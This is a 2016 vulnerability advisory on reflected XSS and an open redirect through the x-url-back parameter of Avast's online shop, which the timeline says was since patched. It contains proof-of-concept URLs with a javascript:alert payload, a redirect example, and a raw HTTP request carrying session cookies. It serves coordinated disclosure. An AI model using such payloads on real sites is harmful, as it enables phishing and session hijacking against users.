AVAST (Shop) #18 - Multiple Client Side XSS Vulnerabilities

Document Title:
===============
AVAST (Shop) #18 - Multiple Client Side XSS Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1635


Release Date:
=============
2016-05-25


Vulnerability Laboratory ID (VL-ID):
====================================
1635


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST Software s.r.o., a Czech private limited company. 
Avast was founded in 1988, and is headquartered in Prague, Czech Republic. It produces antivirus and security programs for personal and commercial use. In January 
2015, Avast had 21.4% of the worldwide security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According 
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software products have a user interface available 
in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple client-side web vulnerabilities in the official Avast Shop online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-11-04: Researcher Notification & Coordination (Karim Rahal)
2015-11-05: Vendor Notification (AVAST Security Team - Bug Bounty Program)
2015-11-09: Vendor Response/Feedback (AVAST Security Team - Bug Bounty Program)
2016-02-26: Vendor Fix/Patch (AVAST Developer Team)
2016-05-25: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AVAST!
Product: Online Service - Web Application 2015 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used 
in phishing attacks to get users to visit malicious sites without realizing it. Reflected(non-persistent) XSS is when there is an payload inside a page 
inside its URL that leads to it being executed and this can be done for inserting malicious code inside the page and giving it to the victim and once the 
victim visits the URL the script (payload) will run and exploit the malicious code into the victim. Open redirect is done because of misconfiguration or 
lack of filtering inside the URL that leads the website to redirect to any url through just a URL parmeter like this one `x-url-back` inside AVAST!, 
Once attacker changes `x-url-back` to an website URL, the page will redirect to the attacker`s Website url because the website of the attacker is set 
inside the `x-url-back` parameter. The xss is done because of lack of filtering inside the `x-url-back` parameter that doesn`t filter the XSS scripts/payloads 
which allows the attacker to add code into the page through the `x-url-back` parameter inside the page and execute the xss script through `reflective` Form.

The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the non-persistent redirect and cross site scripting vulnerability requires no privileged web application user account and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of 
malicious script codes or non-persistent web module context manipulation.

Request Method(s):
				[+] GET

Vulnerable Service(s):
				[+] shopt.avast.com

Vulnerable Module(s):
				[+] ./1254/

Vulnerable Parameter(s):
				[+] scope
				[+] x-url-back


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privilege web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


PoC: Cross Site Scripting (Client-Side)
https://shop.avast.com/1254/?scope=confirmation&transaction=T3YvW1tD0A&id=CuGRUzSWLS&x-url-back=javascript:alert("XSS516")

PoC or Exploitcode: Redirect
https://shop.avast.com/1254/?scope=confirmation&transaction=T3YvW1tD0A&id=CuGRUzSWLS&x-url-back=http://vulnerability-lab.com
Note: Click cancel button to run exploitation


--- PoC Session logs [GET] (Visiting Page with XSS payload) ---
https://shop.avast.com/1254/?scope=confirmation&transaction=T3YvW1tD0A&id=CuGRUzSWLS&x-url-back=javascript:alert(1)
GET /1254/?scope=confirmation&transaction=T3YvW1tD0A&id=CuGRUzSWLS&x-url-back=javascript:alert(1) HTTP/1.1
Host: shop.avast.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: locale2=en-ww; _ga=GA1.2.1525308852.1441304200; s_fid=2AFFF8AE00345EC4-35D71565E4ED40A3; osc_omcid=undefined; s_nr2=1445965096531-Repeat; 
s_vi=[CS]v1|2B15CC53053117C1-6000011080005E70[CE]; fbm_273679106083329=base_domain=.avast.com; IDT2=IDTR-52950-2X7dJugbPC3fm7FWVmXXM1MxZcsWxhZC5ct35444; 
__zlcmid=XPf3hHfSLhFLkq; __utma=1.1525308852.1441304200.1445962606.1445962606.1; __utmb=1.28.10.1445962606; __utmc=1; 
__utmz=1.1445962606.1.1.utmcsr=business.avast.com|utmccn=(referral)|utmcmd=referral|utmcct=/; cbsession2=gSnQxiCwH5hsTiB; 
cbsession1=OYOVzKaEX2=VQa4sXHkHAskwfa&PN59AmFBox=6E8n2UYlc87U20Y&CuGRUzSWLS=dLt8DezMcaRNSGb; s_cc=true; osc_v12=Website; osc_v13=Website%20%7C%20Direct; 
osc_v14=Website%20%7C%20Direct%20%7C; osc_v15=Website%20%7C%20Direct%20%7C; osc_v27=Website%20%7C%20Direct; osc_v42=web; osc_ot=wd>wd>>; x-otid=wd>wd>>; 
s_sq=%5B%5BB%5D%5D; p0=0=81861004-vdC8wg2zGkDUJnA4fScs; __utmt=1; _gat_cb=1; _dc_gtm_UA-58120669-2=1; BC-SID=eec994bc-93e7-4746-907f-39bc6a4c331b; 
BC-localIdSession="IDTR-52950-2X7dJugbPC3fm7FWVmXXM1MxZcsWxhZC5ct35444:1"; _gat_UA-58120669-2=1; osc_v28=Products%20%7C%20Store; 
RT=r=https%3A%2F%2Fstore.avast.com%2Fstore%3Bjsessionid%3DCC85041F36FD90DFE76CDFF6E1F6E156%3FAction%3DDisplayPage%26Locale%3Den_
NZ%26SiteID%3Davast%26ThemeID%3D38044100%26id%3DQuickBuyCartPage&ul=1445965101673&hd=1445965102043
Connection: keep-alive
-
HTTP/1.1 200 OK
Date: Tue, 27 Oct 2015 17:01:25 GMT
Server: Apache
Cache-Control: private
Content-Language: en
X-Robots-Tag: noindex,noarchive,nofollow
X-Frame-Options: DENY
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
p3p: policyref="/w3c/p3p.xml", CP="NON DSP COR CURi ADMa DEVa TAIa HISa OUR LEG PHY ONL PUR COM INT LOC"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8


Reference(s):
https://shop.avast.com/
https://shop.avast.com/1254/


Security Risk:
==============
The security risk of the client-side web vulnerabilities in the avast shop website service is estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Karim Rahal [[email protected] / [email protected]] - @KarimMTV [http://www.vulnerability-lab.com/show.php?user=Karim%20Rahal]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    [email protected] 	- [email protected] 	       		- [email protected]
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
([email protected] or [email protected]) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™